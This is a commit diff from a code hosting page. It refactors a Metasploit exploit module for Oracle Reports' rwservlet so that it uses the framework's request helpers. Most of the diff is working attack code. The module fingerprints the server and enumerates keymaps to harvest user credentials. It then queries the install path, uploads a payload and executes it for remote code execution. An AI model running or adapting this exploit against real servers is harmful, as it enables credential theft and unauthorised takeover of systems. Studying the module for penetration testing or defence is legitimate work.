updated
parent
f6291eb9a8
commit
5a883a4477
|
@ -67,19 +67,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def check
|
||||||
url = datastore['RHOST']
|
res = send_request_cgi({
|
||||||
url = "http://" + url + "/reports/rwservlet/showmap"
|
'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showmap"),
|
||||||
uri = URI.parse(url)
|
'method' => 'GET'
|
||||||
begin
|
})
|
||||||
html = uri.open.read
|
|
||||||
rescue
|
unless res and res.body.include?("Reports Services")
|
||||||
return Exploit::CheckCode::Safe
|
return Exploit::CheckCode::Safe
|
||||||
end
|
end
|
||||||
if html =~ /Reports Servlet Key Map/
|
|
||||||
return Exploit::CheckCode::Appears
|
return Exploit::CheckCode::Appears
|
||||||
else
|
|
||||||
return Exploit::CheckCode::Safe
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
@ -89,28 +86,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
@payload_dir = datastore['PAYDIR']
|
@payload_dir = datastore['PAYDIR']
|
||||||
@local_path = ""
|
@local_path = ""
|
||||||
|
|
||||||
@url = datastore['RHOST']
|
uri = target_uri.path
|
||||||
url = "http://" + @url + "/reports/rwservlet/showmap"
|
res = send_request_cgi({
|
||||||
uri = URI.parse(url)
|
'uri' => normalize_uri(uri, "/reports/rwservlet/showmap"),
|
||||||
begin
|
'method' => 'GET'
|
||||||
html = uri.open.read
|
})
|
||||||
rescue
|
|
||||||
fail_with(Failure::Unknown, "#{peer} - target is not vulnerable or unreachable")
|
|
||||||
end
|
|
||||||
|
|
||||||
if html.include?("Reports Servlet Key Map")
|
if res and res.body.include?("Reports Services")
|
||||||
test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
|
test = res.body.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
|
||||||
|
|
||||||
#Parse keymaps for servers
|
#Parse keymaps for servers
|
||||||
print_status "#{peer} - Enumerating keymaps ... "
|
print_status "#{peer} - Enumerating keymaps ... "
|
||||||
uri = target_uri.path
|
|
||||||
test.each do |t|
|
test.each do |t|
|
||||||
if not @hacked
|
if not @hacked
|
||||||
t = t.delete(' ')
|
t = t.delete(' ')
|
||||||
|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => normalize_uri(uri, "/reports/rwservlet/parsequery?#{t}"),
|
'uri' => normalize_uri(uri, "/reports/rwservlet/parsequery?#{t}"),
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
})
|
})
|
||||||
|
|
||||||
if res and res.code == 200
|
if res and res.code == 200
|
||||||
if res.body =~ /userid=(.*)@/
|
if res.body =~ /userid=(.*)@/
|
||||||
authid = $1
|
authid = $1
|
||||||
|
@ -161,20 +156,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
print_good "#{peer} - Found credentials: #{authid}"
|
print_good "#{peer} - Found credentials: #{authid}"
|
||||||
print_status "#{peer} - Querying showenv ..."
|
print_status "#{peer} - Querying showenv ..."
|
||||||
|
|
||||||
url = "http://" + @url + "/reports/rwservlet/showenv?server=#{server}&authid=#{authid}"
|
res = send_request_cgi({
|
||||||
uri = URI.parse(url)
|
'uri' => normalize_uri(target_uri.path, "/reports/rwservlet/showenv"),
|
||||||
begin
|
'method' => 'GET',
|
||||||
html = uri.open.read
|
'vars_get' => {
|
||||||
rescue
|
'server' => server,
|
||||||
print_status("#{peer} - Query failed")
|
'authid' => authid
|
||||||
else
|
}
|
||||||
if html =~ /\\(.*)\\showenv/
|
})
|
||||||
|
|
||||||
|
if res and res.code == 200
|
||||||
|
if res.body =~ /\\(.*)\\showenv/
|
||||||
print_good "#{peer} - Query succeeded!"
|
print_good "#{peer} - Query succeeded!"
|
||||||
print_status "#{peer} - Windows install detected "
|
print_status "#{peer} - Windows install detected "
|
||||||
print_status "#{peer} - Uploading payload ..."
|
print_status "#{peer} - Uploading payload ..."
|
||||||
@local_path = $1.gsub("\\", "/")
|
@local_path = $1.gsub("\\", "/")
|
||||||
setup_payload
|
setup_payload
|
||||||
elsif html =~ /\/(.*)\/showenv/
|
elsif res.body =~ /\/(.*)\/showenv/
|
||||||
print_good "#{peer} - Query succeeded!"
|
print_good "#{peer} - Query succeeded!"
|
||||||
print_status "#{peer} - Linux install detected"
|
print_status "#{peer} - Linux install detected"
|
||||||
print_status "#{peer} - Uploading payload ..."
|
print_status "#{peer} - Uploading payload ..."
|
||||||
|
@ -189,9 +187,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def upload_payload
|
def upload_payload
|
||||||
path = "/#{@local_path}#{@payload_dir}#{@payload_name}"
|
path = "/#{@local_path}#{@payload_dir}#{@payload_name}"
|
||||||
|
|
||||||
uri = target_uri.path
|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => normalize_uri(uri, "/reports/rwservlet"),
|
'uri' => normalize_uri(target_uri.path, "/reports/rwservlet"),
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'encode_params' => false,
|
'encode_params' => false,
|
||||||
'vars_get' => {
|
'vars_get' => {
|
||||||
|
@ -244,6 +241,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exec_payload
|
def exec_payload
|
||||||
|
if @hacked
|
||||||
print_status("#{peer} - Our payload is at: #{peer}/reports#{@payload_dir}#{@payload_name}")
|
print_status("#{peer} - Our payload is at: #{peer}/reports#{@payload_dir}#{@payload_name}")
|
||||||
print_status("#{peer} - Executing payload...")
|
print_status("#{peer} - Executing payload...")
|
||||||
|
|
||||||
|
@ -253,3 +251,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
})
|
})
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
end
|
||||||
|
|
Loading…
Reference in New Issue